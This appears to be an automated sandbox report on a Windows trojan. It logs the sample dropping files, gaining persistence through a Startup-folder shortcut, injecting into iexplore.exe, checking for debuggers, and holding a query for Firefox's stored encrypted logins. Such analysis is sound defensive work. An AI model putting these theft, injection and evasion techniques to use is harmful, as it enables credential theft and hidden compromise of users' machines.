Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: String function: 00AAD340 appears 37 times
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: String function: 00AAD232 appears 122 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: String function: 030240C4 appears 39 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: String function: 04B64030 appears 39 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B4F8FF DuplicateTokenEx,Wow64DisableWow64FsRedirection,CreateProcessAsUserW,GetLastError,Wow64RevertWow64FsRedirection,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004637A8 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0045893C GetSubMenu,SaveDC,RestoreDC,73BEB080,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00448B44 NtdllDefWindowProc_A,GetCapture
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0043AFAC NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_004637A8 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0045893C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00448B44 NtdllDefWindowProc_A,GetCapture
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0043AFAC NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: cANdLlHS4N.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exe | Virustotal: Detection: 77%
Source: cANdLlHS4N.exe | Metadefender: Detection: 64%
Source: cANdLlHS4N.exe | ReversingLabs: Detection: 84%
Source: cANdLlHS4N.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\cANdLlHS4N.exe "C:\Users\user\Desktop\cANdLlHS4N.exe"
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Process created: C:\Users\user\AppData\Local\Temp\obedience.exe C:\Users\user\AppData\Local\Temp\obedience.exe
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\obedience.exe "C:\Users\user\AppData\Local\Temp\obedience.exe"
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Process created: C:\Users\user\AppData\Local\Temp\obedience.exe C:\Users\user\AppData\Local\Temp\obedience.exe
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnk
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | File created: C:\Users\user\AppData\Local\Temp\obedience.exe
Source: obedience.exe.0.dr | Binary string: \Device\
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/4@0/3
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_009A13B0 _memset,_memset,_memset,_memset,_memset,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,SHGetSpecialFolderPathA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,_strrchr,lstrcpyA,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,Sleep
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004099C2 GetDiskFreeSpaceA
Source: obedience.exe, 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, obedience.exe, 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: select hostname, encryptedUsername, encryptedPassword from moz_logins where hostname like "moz-proxy://%s%%";
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00426E50 GetLastError,FormatMessageA
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_009A12C0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Mutant created: \Sessions\1\BaseNamedObjects\cplusplus_me
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_009B508E FindResourceA,LoadResource,FreeResource
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: cANdLlHS4N.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: cANdLlHS4N.exe | Static file information: File size 3804160 > 1048576
Source: cANdLlHS4N.exe | Static PE information: section name: RT_CURSOR
Source: cANdLlHS4N.exe | Static PE information: section name: RT_BITMAP
Source: cANdLlHS4N.exe | Static PE information: section name: RT_ICON
Source: cANdLlHS4N.exe | Static PE information: section name: RT_MENU
Source: cANdLlHS4N.exe | Static PE information: section name: RT_DIALOG
Source: cANdLlHS4N.exe | Static PE information: section name: RT_STRING
Source: cANdLlHS4N.exe | Static PE information: section name: RT_ACCELERATOR
Source: cANdLlHS4N.exe | Static PE information: section name: RT_GROUP_ICON
Source: cANdLlHS4N.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x134a00
Source: cANdLlHS4N.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1f0200
Source: cANdLlHS4N.exe | Static PE information: More than 200 imports for USER32.dll
Source: cANdLlHS4N.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: cANdLlHS4N.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cANdLlHS4N.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cANdLlHS4N.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cANdLlHS4N.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cANdLlHS4N.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AAD385 push ecx; ret 0_2_00AAD398
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AAD30A push ecx; ret 0_2_00AAD31D
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00450214 push 004502A1h; ret 1_2_00450299
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0048A028 push 0048A054h; ret 1_2_0048A04C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004660E8 push 00466114h; ret 1_2_0046610C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0043E0F8 push 0043E124h; ret 1_2_0043E11C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00482094 push ecx; mov dword ptr [esp], edx 1_2_00482099
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00486158 push 00486184h; ret 1_2_0048617C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00466120 push 0046614Ch; ret 1_2_00466144
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0043018C push 004301B8h; ret 1_2_004301B0
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004501AC push 00450212h; ret 1_2_0045020A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00488254 push 00488280h; ret 1_2_00488278
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0043E260 push 0043E28Ch; ret 1_2_0043E284
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0048821C push 00488248h; ret 1_2_00488240
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0048A310 push 0048A33Ch; ret 1_2_0048A334
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004205FC push ecx; mov dword ptr [esp], edx 1_2_004205FE
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0048A5A4 push 0048A5D0h; ret 1_2_0048A5C8
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0041867C push ecx; mov dword ptr [esp], eax 1_2_0041867D
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00466714 push 00466757h; ret 1_2_0046674F
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004188E0 push ecx; mov dword ptr [esp], edx 1_2_004188E5
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0041C968 push ecx; mov dword ptr [esp], edx 1_2_0041C96A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0048A9C0 push 0048A9ECh; ret 1_2_0048A9E4
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0042CA4C push 0042CB1Ch; ret 1_2_0042CB14
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0048CA34 push 0048CA60h; ret 1_2_0048CA58
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00466B78 push 00466BA4h; ret 1_2_00466B9C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00406B08 push 00406B59h; ret 1_2_00406B51
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00418B08 push ecx; mov dword ptr [esp], edx 1_2_00418B0D
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00430B10 push 00430B5Fh; ret 1_2_00430B57
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00416BD4 push 00416C21h; ret 1_2_00416C19
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00466BE8 push 00466C14h; ret 1_2_00466C0C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00466BB0 push 00466BDCh; ret 1_2_00466BD4
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AC046C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: StarBurn.dll.0.dr | Static PE information: real checksum: 0x29839 should be: 0x293b5
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | File created: C:\Users\user\AppData\Local\Temp\obedience.exe
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | File created: C:\Users\user\AppData\Local\Temp\StarBurn.dll
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnk
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnk

Hooking and other Techniques for Hiding and Protection

Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon2060.png
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_009A836B IsWindowVisible,IsIconic
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00463830 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0044A290 IsIconic,GetCapture
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00460740 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0044AB44 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0044B468 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0042D738 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00463830 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0044A290 IsIconic,GetCapture
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00460740 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0044AB44 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0044B468 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0042D738 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00430384 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0043EDE4
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0043EDE4
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_1-47245
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-21982
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000409
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000409
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject 1_2_00462D8C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject 3_2_00462D8C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | API coverage: 6.2 %
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | API coverage: 6.4 %
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | API coverage: 6.0 %
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0043EDE4
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004273EC GetSystemInfo
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_009C8B98 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_strcpy_s
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B4B33C FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | API call chain: ExitProcess graph end node graph_2-47130
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AAB46A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AC046C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B4BC1E GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_03000019 mov eax, dword ptr fs:[00000030h] 2_2_03000019
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AAB46A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AB4A12 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_6ED9862C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B605A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B58E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_6EE5862C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 3000000
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 923650
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 3000000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2D00000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: C:\Users\user\AppData\Local\Temp\obedience.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\obedience.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00AC2663
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: GetLocaleInfoA,0_2_00AB0970
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00AC2AEB
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,0_2_009B1AD1
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_00AC2B8E
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00AC2B52
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_0040610C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_00406217
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,1_2_0040C46C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,1_2_0040C420
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,1_2_00406A94
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,GetACP,1_2_0040DB00
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_6ED9CB7A
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_6ED9C88C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0301C300
